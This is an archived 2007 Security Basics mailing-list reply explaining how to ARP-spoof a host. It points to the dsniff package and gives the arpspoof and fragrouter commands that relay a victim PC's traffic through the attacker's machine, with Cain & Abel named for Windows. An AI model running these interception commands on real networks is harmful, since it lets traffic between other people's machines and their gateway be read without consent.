Security Basics mailing list archives

AW: Arp spoffing question

From: "Raimar Melchior" <r.melchior () telonic de>
Date: Wed, 7 Feb 2007 16:31:53 +0100

I suspect you mean arp-spoofing. Take a look at the dsniff package. It
contains the arpspoof utility. You should also get fragrouter, so that your
PC acts as a relay between pc A  and the gateway

http://monkey.org/~dugsong/dsniff/

# arpspoof -t <pcA_ip> <gateway_ip>
# fragrouter -B1

These are Linux utilities. If you are going to use Windows you should use
Cain & Abel.

- Raimar